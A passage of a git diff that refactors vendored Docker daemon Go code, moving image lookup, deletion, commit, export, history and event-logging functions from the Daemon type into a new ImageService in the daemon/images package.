newTag reference.Named) error { - if err := daemon.referenceStore.AddTag(newTag, imageID.Digest(), true); err != nil { - return err - } - - daemon.LogImageEvent(imageID.String(), newTag.String(), "tag") - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/images/cache.go b/vendor/github.com/docker/docker/daemon/images/cache.go new file mode 100644 index 0000000000..3b433106e8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/cache.go @@ -0,0 +1,27 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "github.com/docker/docker/builder" + "github.com/docker/docker/image/cache" + "github.com/sirupsen/logrus" +) + +// MakeImageCache creates a stateful image cache. 
+func (i *ImageService) MakeImageCache(sourceRefs []string) builder.ImageCache { + if len(sourceRefs) == 0 { + return cache.NewLocal(i.imageStore) + } + + cache := cache.New(i.imageStore) + + for _, ref := range sourceRefs { + img, err := i.GetImage(ref) + if err != nil { + logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err) + continue + } + cache.Populate(img) + } + + return cache +} diff --git a/vendor/github.com/docker/docker/daemon/images/image.go b/vendor/github.com/docker/docker/daemon/images/image.go new file mode 100644 index 0000000000..79cc07c4fd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image.go @@ -0,0 +1,64 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "fmt" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/image" +) + +// ErrImageDoesNotExist is error returned when no image can be found for a reference. +type ErrImageDoesNotExist struct { + ref reference.Reference +} + +func (e ErrImageDoesNotExist) Error() string { + ref := e.ref + if named, ok := ref.(reference.Named); ok { + ref = reference.TagNameOnly(named) + } + return fmt.Sprintf("No such image: %s", reference.FamiliarString(ref)) +} + +// NotFound implements the NotFound interface +func (e ErrImageDoesNotExist) NotFound() {} + +// GetImage returns an image corresponding to the image referred to by refOrID. 
+func (i *ImageService) GetImage(refOrID string) (*image.Image, error) { + ref, err := reference.ParseAnyReference(refOrID) + if err != nil { + return nil, errdefs.InvalidParameter(err) + } + namedRef, ok := ref.(reference.Named) + if !ok { + digested, ok := ref.(reference.Digested) + if !ok { + return nil, ErrImageDoesNotExist{ref} + } + id := image.IDFromDigest(digested.Digest()) + if img, err := i.imageStore.Get(id); err == nil { + return img, nil + } + return nil, ErrImageDoesNotExist{ref} + } + + if digest, err := i.referenceStore.Get(namedRef); err == nil { + // Search the image stores to get the operating system, defaulting to host OS. + id := image.IDFromDigest(digest) + if img, err := i.imageStore.Get(id); err == nil { + return img, nil + } + } + + // Search based on ID + if id, err := i.imageStore.Search(refOrID); err == nil { + img, err := i.imageStore.Get(id) + if err != nil { + return nil, ErrImageDoesNotExist{ref} + } + return img, nil + } + + return nil, ErrImageDoesNotExist{ref} +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_builder.go b/vendor/github.com/docker/docker/daemon/images/image_builder.go new file mode 100644 index 0000000000..ca7d0fda4a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_builder.go @@ -0,0 +1,219 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "context" + "io" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/builder" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/registry" + "github.com/pkg/errors" +) + +type roLayer struct { + released bool + layerStore layer.Store + roLayer layer.Layer +} + +func (l *roLayer) DiffID() layer.DiffID { + if l.roLayer == nil { + 
return layer.DigestSHA256EmptyTar + } + return l.roLayer.DiffID() +} + +func (l *roLayer) Release() error { + if l.released { + return nil + } + if l.roLayer != nil { + metadata, err := l.layerStore.Release(l.roLayer) + layer.LogReleaseMetadata(metadata) + if err != nil { + return errors.Wrap(err, "failed to release ROLayer") + } + } + l.roLayer = nil + l.released = true + return nil +} + +func (l *roLayer) NewRWLayer() (builder.RWLayer, error) { + var chainID layer.ChainID + if l.roLayer != nil { + chainID = l.roLayer.ChainID() + } + + mountID := stringid.GenerateRandomID() + newLayer, err := l.layerStore.CreateRWLayer(mountID, chainID, nil) + if err != nil { + return nil, errors.Wrap(err, "failed to create rwlayer") + } + + rwLayer := &rwLayer{layerStore: l.layerStore, rwLayer: newLayer} + + fs, err := newLayer.Mount("") + if err != nil { + rwLayer.Release() + return nil, err + } + + rwLayer.fs = fs + + return rwLayer, nil +} + +type rwLayer struct { + released bool + layerStore layer.Store + rwLayer layer.RWLayer + fs containerfs.ContainerFS +} + +func (l *rwLayer) Root() containerfs.ContainerFS { + return l.fs +} + +func (l *rwLayer) Commit() (builder.ROLayer, error) { + stream, err := l.rwLayer.TarStream() + if err != nil { + return nil, err + } + defer stream.Close() + + var chainID layer.ChainID + if parent := l.rwLayer.Parent(); parent != nil { + chainID = parent.ChainID() + } + + newLayer, err := l.layerStore.Register(stream, chainID) + if err != nil { + return nil, err + } + // TODO: An optimization would be to handle empty layers before returning + return &roLayer{layerStore: l.layerStore, roLayer: newLayer}, nil +} + +func (l *rwLayer) Release() error { + if l.released { + return nil + } + + if l.fs != nil { + if err := l.rwLayer.Unmount(); err != nil { + return errors.Wrap(err, "failed to unmount RWLayer") + } + l.fs = nil + } + + metadata, err := l.layerStore.ReleaseRWLayer(l.rwLayer) + layer.LogReleaseMetadata(metadata) + if err != nil { + return 
errors.Wrap(err, "failed to release RWLayer") + } + l.released = true + return nil +} + +func newROLayerForImage(img *image.Image, layerStore layer.Store) (builder.ROLayer, error) { + if img == nil || img.RootFS.ChainID() == "" { + return &roLayer{layerStore: layerStore}, nil + } + // Hold a reference to the image layer so that it can't be removed before + // it is released + layer, err := layerStore.Get(img.RootFS.ChainID()) + if err != nil { + return nil, errors.Wrapf(err, "failed to get layer for image %s", img.ImageID()) + } + return &roLayer{layerStore: layerStore, roLayer: layer}, nil +} + +// TODO: could this use the regular daemon PullImage ? +func (i *ImageService) pullForBuilder(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer, os string) (*image.Image, error) { + ref, err := reference.ParseNormalizedNamed(name) + if err != nil { + return nil, err + } + ref = reference.TagNameOnly(ref) + + pullRegistryAuth := &types.AuthConfig{} + if len(authConfigs) > 0 { + // The request came with a full auth config, use it + repoInfo, err := i.registryService.ResolveRepository(ref) + if err != nil { + return nil, err + } + + resolvedConfig := registry.ResolveAuthConfig(authConfigs, repoInfo.Index) + pullRegistryAuth = &resolvedConfig + } + + if err := i.pullImageWithReference(ctx, ref, os, nil, pullRegistryAuth, output); err != nil { + return nil, err + } + return i.GetImage(name) +} + +// GetImageAndReleasableLayer returns an image and releaseable layer for a reference or ID. +// Every call to GetImageAndReleasableLayer MUST call releasableLayer.Release() to prevent +// leaking of layers. 
+func (i *ImageService) GetImageAndReleasableLayer(ctx context.Context, refOrID string, opts backend.GetImageAndLayerOptions) (builder.Image, builder.ROLayer, error) { + if refOrID == "" { + if !system.IsOSSupported(opts.OS) { + return nil, nil, system.ErrNotSupportedOperatingSystem + } + layer, err := newROLayerForImage(nil, i.layerStores[opts.OS]) + return nil, layer, err + } + + if opts.PullOption != backend.PullOptionForcePull { + image, err := i.GetImage(refOrID) + if err != nil && opts.PullOption == backend.PullOptionNoPull { + return nil, nil, err + } + // TODO: shouldn't we error out if error is different from "not found" ? + if image != nil { + if !system.IsOSSupported(image.OperatingSystem()) { + return nil, nil, system.ErrNotSupportedOperatingSystem + } + layer, err := newROLayerForImage(image, i.layerStores[image.OperatingSystem()]) + return image, layer, err + } + } + + image, err := i.pullForBuilder(ctx, refOrID, opts.AuthConfig, opts.Output, opts.OS) + if err != nil { + return nil, nil, err + } + if !system.IsOSSupported(image.OperatingSystem()) { + return nil, nil, system.ErrNotSupportedOperatingSystem + } + layer, err := newROLayerForImage(image, i.layerStores[image.OperatingSystem()]) + return image, layer, err +} + +// CreateImage creates a new image by adding a config and ID to the image store. +// This is similar to LoadImage() except that it receives JSON encoded bytes of +// an image instead of a tar archive. 
+func (i *ImageService) CreateImage(config []byte, parent string) (builder.Image, error) { + id, err := i.imageStore.Create(config) + if err != nil { + return nil, errors.Wrapf(err, "failed to create image") + } + + if parent != "" { + if err := i.imageStore.SetParent(id, image.ID(parent)); err != nil { + return nil, errors.Wrapf(err, "failed to set parent %s", parent) + } + } + + return i.imageStore.Get(id) +} diff --git a/vendor/github.com/docker/docker/daemon/images/image_commit.go b/vendor/github.com/docker/docker/daemon/images/image_commit.go new file mode 100644 index 0000000000..4caba9f27b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_commit.go @@ -0,0 +1,127 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "encoding/json" + "io" + + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" +) + +// CommitImage creates a new image from a commit config +func (i *ImageService) CommitImage(c backend.CommitConfig) (image.ID, error) { + layerStore, ok := i.layerStores[c.ContainerOS] + if !ok { + return "", system.ErrNotSupportedOperatingSystem + } + rwTar, err := exportContainerRw(layerStore, c.ContainerID, c.ContainerMountLabel) + if err != nil { + return "", err + } + defer func() { + if rwTar != nil { + rwTar.Close() + } + }() + + var parent *image.Image + if c.ParentImageID == "" { + parent = new(image.Image) + parent.RootFS = image.NewRootFS() + } else { + parent, err = i.imageStore.Get(image.ID(c.ParentImageID)) + if err != nil { + return "", err + } + } + + l, err := layerStore.Register(rwTar, parent.RootFS.ChainID()) + if err != nil { + return "", err + } + defer layer.ReleaseAndLog(layerStore, l) + + cc := image.ChildConfig{ + ContainerID: c.ContainerID, + Author: c.Author, + Comment: c.Comment, + ContainerConfig: c.ContainerConfig, 
+ Config: c.Config, + DiffID: l.DiffID(), + } + config, err := json.Marshal(image.NewChildImage(parent, cc, c.ContainerOS)) + if err != nil { + return "", err + } + + id, err := i.imageStore.Create(config) + if err != nil { + return "", err + } + + if c.ParentImageID != "" { + if err := i.imageStore.SetParent(id, image.ID(c.ParentImageID)); err != nil { + return "", err + } + } + return id, nil +} + +func exportContainerRw(layerStore layer.Store, id, mountLabel string) (arch io.ReadCloser, err error) { + rwlayer, err := layerStore.GetRWLayer(id) + if err != nil { + return nil, err + } + defer func() { + if err != nil { + layerStore.ReleaseRWLayer(rwlayer) + } + }() + + // TODO: this mount call is not necessary as we assume that TarStream() should + // mount the layer if needed. But the Diff() function for windows requests that + // the layer should be mounted when calling it. So we reserve this mount call + // until windows driver can implement Diff() interface correctly. + _, err = rwlayer.Mount(mountLabel) + if err != nil { + return nil, err + } + + archive, err := rwlayer.TarStream() + if err != nil { + rwlayer.Unmount() + return nil, err + } + return ioutils.NewReadCloserWrapper(archive, func() error { + archive.Close() + err = rwlayer.Unmount() + layerStore.ReleaseRWLayer(rwlayer) + return err + }), + nil +} + +// CommitBuildStep is used by the builder to create an image for each step in +// the build. +// +// This method is different from CreateImageFromContainer: +// * it doesn't attempt to validate container state +// * it doesn't send a commit action to metrics +// * it doesn't log a container commit event +// +// This is a temporary shim. Should be removed when builder stops using commit. 
+func (i *ImageService) CommitBuildStep(c backend.CommitConfig) (image.ID, error) { + container := i.containers.Get(c.ContainerID) + if container == nil { + // TODO: use typed error + return "", errors.Errorf("container not found: %s", c.ContainerID) + } + c.ContainerMountLabel = container.MountLabel + c.ContainerOS = container.OS + c.ParentImageID = string(container.ImageID) + return i.CommitImage(c) +} diff --git a/vendor/github.com/docker/docker/daemon/image_delete.go b/vendor/github.com/docker/docker/daemon/images/image_delete.go similarity index 72% rename from vendor/github.com/docker/docker/daemon/image_delete.go rename to vendor/github.com/docker/docker/daemon/images/image_delete.go index 3e3c142e9c..94d6f872dd 100644 --- a/vendor/github.com/docker/docker/daemon/image_delete.go +++ b/vendor/github.com/docker/docker/daemon/images/image_delete.go @@ -1,22 +1,24 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "fmt" "strings" "time" - "github.com/docker/docker/api/errors" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" ) type conflictType int const ( - conflictDependentChild conflictType = (1 << iota) + conflictDependentChild conflictType = 1 << iota conflictRunningContainer conflictActiveReference conflictStoppedContainer @@ -58,19 +60,24 @@ const ( // meaning any delete conflicts will cause the image to not be deleted and the // conflict will not be reported. // -// FIXME: remove ImageDelete's dependency on Daemon, then move to the graph -// package. This would require that we no longer need the daemon to determine -// whether images are being used by a stopped or running container. 
-func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDelete, error) { +func (i *ImageService) ImageDelete(imageRef string, force, prune bool) ([]types.ImageDeleteResponseItem, error) { start := time.Now() - records := []types.ImageDelete{} + records := []types.ImageDeleteResponseItem{} - imgID, err := daemon.GetImageID(imageRef) + img, err := i.GetImage(imageRef) if err != nil { - return nil, daemon.imageNotExistToErrcode(err) + return nil, err + } + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, errors.Errorf("unable to delete image: %q", system.ErrNotSupportedOperatingSystem) } - repoRefs := daemon.referenceStore.References(imgID.Digest()) + imgID := img.ID() + repoRefs := i.referenceStore.References(imgID.Digest()) + + using := func(c *container.Container) bool { + return c.ImageID == imgID + } var removedRepositoryRef bool if !isImageIDPrefix(imgID.String(), imageRef) { @@ -79,32 +86,32 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I // true, there are multiple repository references to this // image, or there are no containers using the given reference. if !force && isSingleReference(repoRefs) { - if container := daemon.getContainerUsingImage(imgID); container != nil { + if container := i.containers.First(using); container != nil { // If we removed the repository reference then // this image would remain "dangling" and since // we really want to avoid that the client must // explicitly force its removal. 
- err := fmt.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String())) - return nil, errors.NewRequestConflictError(err) + err := errors.Errorf("conflict: unable to remove repository reference %q (must force) - container %s is using its referenced image %s", imageRef, stringid.TruncateID(container.ID), stringid.TruncateID(imgID.String())) + return nil, errdefs.Conflict(err) } } - parsedRef, err := reference.ParseNamed(imageRef) + parsedRef, err := reference.ParseNormalizedNamed(imageRef) if err != nil { return nil, err } - parsedRef, err = daemon.removeImageRef(parsedRef) + parsedRef, err = i.removeImageRef(parsedRef) if err != nil { return nil, err } - untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)} - daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + i.LogImageEvent(imgID.String(), imgID.String(), "untag") records = append(records, untaggedRecord) - repoRefs = daemon.referenceStore.References(imgID.Digest()) + repoRefs = i.referenceStore.References(imgID.Digest()) // If a tag reference was removed and the only remaining // references to the same repository are digest references, @@ -119,14 +126,14 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I } if !foundRepoTagRef { // Remove canonical references from same repository - remainingRefs := []reference.Named{} + var remainingRefs []reference.Named for _, repoRef := range repoRefs { if _, repoRefIsCanonical := repoRef.(reference.Canonical); repoRefIsCanonical && parsedRef.Name() == repoRef.Name() { - if _, err := daemon.removeImageRef(repoRef); err != nil { + if _, err := i.removeImageRef(repoRef); err != nil { return records, err } - untaggedRecord := types.ImageDelete{Untagged: repoRef.String()} + 
untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(repoRef)} records = append(records, untaggedRecord) } else { remainingRefs = append(remainingRefs, repoRef) @@ -152,25 +159,25 @@ func (daemon *Daemon) ImageDelete(imageRef string, force, prune bool) ([]types.I if !force { c |= conflictSoft &^ conflictActiveReference } - if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { + if conflict := i.checkImageDeleteConflict(imgID, c); conflict != nil { return nil, conflict } for _, repoRef := range repoRefs { - parsedRef, err := daemon.removeImageRef(repoRef) + parsedRef, err := i.removeImageRef(repoRef) if err != nil { return nil, err } - untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)} - daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + i.LogImageEvent(imgID.String(), imgID.String(), "untag") records = append(records, untaggedRecord) } } } - if err := daemon.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil { + if err := i.imageDeleteHelper(imgID, &records, force, prune, removedRepositoryRef); err != nil { return nil, err } @@ -218,25 +225,18 @@ func isImageIDPrefix(imageID, possiblePrefix string) bool { return false } -// getContainerUsingImage returns a container that was created using the given -// imageID. Returns nil if there is no such container. -func (daemon *Daemon) getContainerUsingImage(imageID image.ID) *container.Container { - return daemon.containers.First(func(c *container.Container) bool { - return c.ImageID == imageID - }) -} - // removeImageRef attempts to parse and remove the given image reference from // this daemon's store of repository tag/digest references. The given // repositoryRef must not be an image ID but a repository name followed by an // optional tag or digest reference. If tag or digest is omitted, the default // tag is used. 
Returns the resolved image reference and an error. -func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, error) { - ref = reference.WithDefaultTag(ref) +func (i *ImageService) removeImageRef(ref reference.Named) (reference.Named, error) { + ref = reference.TagNameOnly(ref) + // Ignore the boolean value returned, as far as we're concerned, this // is an idempotent operation and it's okay if the reference didn't // exist in the first place. - _, err := daemon.referenceStore.Delete(ref) + _, err := i.referenceStore.Delete(ref) return ref, err } @@ -244,20 +244,20 @@ func (daemon *Daemon) removeImageRef(ref reference.Named) (reference.Named, erro // removeAllReferencesToImageID attempts to remove every reference to the given // imgID from this daemon's store of repository tag/digest references. Returns // on the first encountered error. Removed references are logged to this -// daemon's event service. An "Untagged" types.ImageDelete is added to the +// daemon's event service. An "Untagged" types.ImageDeleteResponseItem is added to the // given list of records. 
-func (daemon *Daemon) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDelete) error { - imageRefs := daemon.referenceStore.References(imgID.Digest()) +func (i *ImageService) removeAllReferencesToImageID(imgID image.ID, records *[]types.ImageDeleteResponseItem) error { + imageRefs := i.referenceStore.References(imgID.Digest()) for _, imageRef := range imageRefs { - parsedRef, err := daemon.removeImageRef(imageRef) + parsedRef, err := i.removeImageRef(imageRef) if err != nil { return err } - untaggedRecord := types.ImageDelete{Untagged: parsedRef.String()} + untaggedRecord := types.ImageDeleteResponseItem{Untagged: reference.FamiliarString(parsedRef)} - daemon.LogImageEvent(imgID.String(), imgID.String(), "untag") + i.LogImageEvent(imgID.String(), imgID.String(), "untag") *records = append(*records, untaggedRecord) } @@ -284,6 +284,8 @@ func (idc *imageDeleteConflict) Error() string { return fmt.Sprintf("conflict: unable to delete %s (%s) - %s", stringid.TruncateID(idc.imgID.String()), forceMsg, idc.message) } +func (idc *imageDeleteConflict) Conflict() {} + // imageDeleteHelper attempts to delete the given image from this daemon. If // the image has any hard delete conflicts (child images or running containers // using the image) then it cannot be deleted. If the image has any soft delete @@ -295,15 +297,15 @@ func (idc *imageDeleteConflict) Error() string { // conflict is encountered, it will be returned immediately without deleting // the image. If quiet is true, any encountered conflicts will be ignored and // the function will return nil immediately without deleting the image. -func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDelete, force, prune, quiet bool) error { +func (i *ImageService) imageDeleteHelper(imgID image.ID, records *[]types.ImageDeleteResponseItem, force, prune, quiet bool) error { // First, determine if this image has any conflicts. Ignore soft conflicts // if force is true. 
c := conflictHard if !force { c |= conflictSoft } - if conflict := daemon.checkImageDeleteConflict(imgID, c); conflict != nil { - if quiet && (!daemon.imageIsDangling(imgID) || conflict.used) { + if conflict := i.checkImageDeleteConflict(imgID, c); conflict != nil { + if quiet && (!i.imageIsDangling(imgID) || conflict.used) { // Ignore conflicts UNLESS the image is "dangling" or not being used in // which case we want the user to know. return nil @@ -314,26 +316,26 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe return conflict } - parent, err := daemon.imageStore.GetParent(imgID) + parent, err := i.imageStore.GetParent(imgID) if err != nil { // There may be no parent parent = "" } // Delete all repository tag/digest references to this image. - if err := daemon.removeAllReferencesToImageID(imgID, records); err != nil { + if err := i.removeAllReferencesToImageID(imgID, records); err != nil { return err } - removedLayers, err := daemon.imageStore.Delete(imgID) + removedLayers, err := i.imageStore.Delete(imgID) if err != nil { return err } - daemon.LogImageEvent(imgID.String(), imgID.String(), "delete") - *records = append(*records, types.ImageDelete{Deleted: imgID.String()}) + i.LogImageEvent(imgID.String(), imgID.String(), "delete") + *records = append(*records, types.ImageDeleteResponseItem{Deleted: imgID.String()}) for _, removedLayer := range removedLayers { - *records = append(*records, types.ImageDelete{Deleted: removedLayer.ChainID.String()}) + *records = append(*records, types.ImageDeleteResponseItem{Deleted: removedLayer.ChainID.String()}) } if !prune || parent == "" { @@ -345,7 +347,7 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe // either running or stopped). // Do not force prunings, but do so quietly (stopping on any encountered // conflicts). 
- return daemon.imageDeleteHelper(parent, records, false, true, true) + return i.imageDeleteHelper(parent, records, false, true, true) } // checkImageDeleteConflict determines whether there are any conflicts @@ -354,9 +356,9 @@ func (daemon *Daemon) imageDeleteHelper(imgID image.ID, records *[]types.ImageDe // using the image. A soft conflict is any tags/digest referencing the given // image or any stopped container using the image. If ignoreSoftConflicts is // true, this function will not check for soft conflict conditions. -func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict { +func (i *ImageService) checkImageDeleteConflict(imgID image.ID, mask conflictType) *imageDeleteConflict { // Check if the image has any descendant images. - if mask&conflictDependentChild != 0 && len(daemon.imageStore.Children(imgID)) > 0 { + if mask&conflictDependentChild != 0 && len(i.imageStore.Children(imgID)) > 0 { return &imageDeleteConflict{ hard: true, imgID: imgID, @@ -369,7 +371,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType running := func(c *container.Container) bool { return c.IsRunning() && c.ImageID == imgID } - if container := daemon.containers.First(running); container != nil { + if container := i.containers.First(running); container != nil { return &imageDeleteConflict{ imgID: imgID, hard: true, @@ -380,7 +382,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType } // Check if any repository tags/digest reference this image. 
- if mask&conflictActiveReference != 0 && len(daemon.referenceStore.References(imgID.Digest())) > 0 { + if mask&conflictActiveReference != 0 && len(i.referenceStore.References(imgID.Digest())) > 0 { return &imageDeleteConflict{ imgID: imgID, message: "image is referenced in multiple repositories", @@ -392,7 +394,7 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType stopped := func(c *container.Container) bool { return !c.IsRunning() && c.ImageID == imgID } - if container := daemon.containers.First(stopped); container != nil { + if container := i.containers.First(stopped); container != nil { return &imageDeleteConflict{ imgID: imgID, used: true, @@ -407,6 +409,6 @@ func (daemon *Daemon) checkImageDeleteConflict(imgID image.ID, mask conflictType // imageIsDangling returns whether the given image is "dangling" which means // that there are no repository references to the given image and it has no // child images. -func (daemon *Daemon) imageIsDangling(imgID image.ID) bool { - return !(len(daemon.referenceStore.References(imgID.Digest())) > 0 || len(daemon.imageStore.Children(imgID)) > 0) +func (i *ImageService) imageIsDangling(imgID image.ID) bool { + return !(len(i.referenceStore.References(imgID.Digest())) > 0 || len(i.imageStore.Children(imgID)) > 0) } diff --git a/vendor/github.com/docker/docker/daemon/images/image_events.go b/vendor/github.com/docker/docker/daemon/images/image_events.go new file mode 100644 index 0000000000..d0b3064d70 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/image_events.go @@ -0,0 +1,39 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "github.com/docker/docker/api/types/events" +) + +// LogImageEvent generates an event related to an image with only the default attributes. 
+func (i *ImageService) LogImageEvent(imageID, refName, action string) { + i.LogImageEventWithAttributes(imageID, refName, action, map[string]string{}) +} + +// LogImageEventWithAttributes generates an event related to an image with specific given attributes. +func (i *ImageService) LogImageEventWithAttributes(imageID, refName, action string, attributes map[string]string) { + img, err := i.GetImage(imageID) + if err == nil && img.Config != nil { + // image has not been removed yet. + // it could be missing if the event is `delete`. + copyAttributes(attributes, img.Config.Labels) + } + if refName != "" { + attributes["name"] = refName + } + actor := events.Actor{ + ID: imageID, + Attributes: attributes, + } + + i.eventsService.Log(action, events.ImageEventType, actor) +} + +// copyAttributes guarantees that labels are not mutated by event triggers. +func copyAttributes(attributes, labels map[string]string) { + if labels == nil { + return + } + for k, v := range labels { + attributes[k] = v + } +} diff --git a/vendor/github.com/docker/docker/daemon/image_exporter.go b/vendor/github.com/docker/docker/daemon/images/image_exporter.go similarity index 61% rename from vendor/github.com/docker/docker/daemon/image_exporter.go rename to vendor/github.com/docker/docker/daemon/images/image_exporter.go index 95d1d3dcdb..58105dcb71 100644 --- a/vendor/github.com/docker/docker/daemon/image_exporter.go +++ b/vendor/github.com/docker/docker/daemon/images/image_exporter.go @@ -1,4 +1,4 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "io" @@ -11,15 +11,15 @@ import ( // stream. All images with the given tag and all versions containing // the same tag are exported. names is the set of tags to export, and // outStream is the writer which the images are written to. 
-func (daemon *Daemon) ExportImage(names []string, outStream io.Writer) error { - imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) +func (i *ImageService) ExportImage(names []string, outStream io.Writer) error { + imageExporter := tarexport.NewTarExporter(i.imageStore, i.layerStores, i.referenceStore, i) return imageExporter.Save(names, outStream) } // LoadImage uploads a set of images into the repository. This is the // complement of ImageExport. The input stream is an uncompressed tar // ball containing images and metadata. -func (daemon *Daemon) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { - imageExporter := tarexport.NewTarExporter(daemon.imageStore, daemon.layerStore, daemon.referenceStore, daemon) +func (i *ImageService) LoadImage(inTar io.ReadCloser, outStream io.Writer, quiet bool) error { + imageExporter := tarexport.NewTarExporter(i.imageStore, i.layerStores, i.referenceStore, i) return imageExporter.Load(inTar, outStream, quiet) } diff --git a/vendor/github.com/docker/docker/daemon/image_history.go b/vendor/github.com/docker/docker/daemon/images/image_history.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/image_history.go rename to vendor/github.com/docker/docker/daemon/images/image_history.go index 839dd1283b..b4ca25b1b6 100644 --- a/vendor/github.com/docker/docker/daemon/image_history.go +++ b/vendor/github.com/docker/docker/daemon/images/image_history.go @@ -1,24 +1,25 @@ -package daemon +package images // import "github.com/docker/docker/daemon/images" import ( "fmt" "time" - "github.com/docker/docker/api/types" + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types/image" "github.com/docker/docker/layer" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" ) // ImageHistory returns a slice of ImageHistory structures for the specified image // name by walking the image lineage. 
-func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { +func (i *ImageService) ImageHistory(name string) ([]*image.HistoryResponseItem, error) { start := time.Now() - img, err := daemon.GetImage(name) + img, err := i.GetImage(name) if err != nil { return nil, err } - history := []*types.ImageHistory{} + history := []*image.HistoryResponseItem{} layerCounter := 0 rootFS := *img.RootFS @@ -31,14 +32,16 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { if len(img.RootFS.DiffIDs) <= layerCounter { return nil, fmt.Errorf("too many non-empty layers in History section") } - + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, system.ErrNotSupportedOperatingSystem + } rootFS.Append(img.RootFS.DiffIDs[layerCounter]) - l, err := daemon.layerStore.Get(rootFS.ChainID()) + l, err := i.layerStores[img.OperatingSystem()].Get(rootFS.ChainID()) if err != nil { return nil, err } layerSize, err = l.DiffSize() - layer.ReleaseAndLog(daemon.layerStore, l) + layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l) if err != nil { return nil, err } @@ -46,7 +49,7 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { layerCounter++ } - history = append([]*types.ImageHistory{{ + history = append([]*image.HistoryResponseItem{{ ID: "", Created: h.Created.Unix(), CreatedBy: h.CreatedBy, @@ -62,9 +65,9 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { h.ID = id.String() var tags []string - for _, r := range daemon.referenceStore.References(id.Digest()) { + for _, r := range i.referenceStore.References(id.Digest()) { if _, ok := r.(reference.NamedTagged); ok { - tags = append(tags, r.String()) + tags = append(tags, reference.FamiliarString(r)) } } @@ -74,7 +77,7 @@ func (daemon *Daemon) ImageHistory(name string) ([]*types.ImageHistory, error) { if id == "" { break } - histImg, err = daemon.GetImage(id.String()) + histImg, err = i.GetImage(id.String()) if 
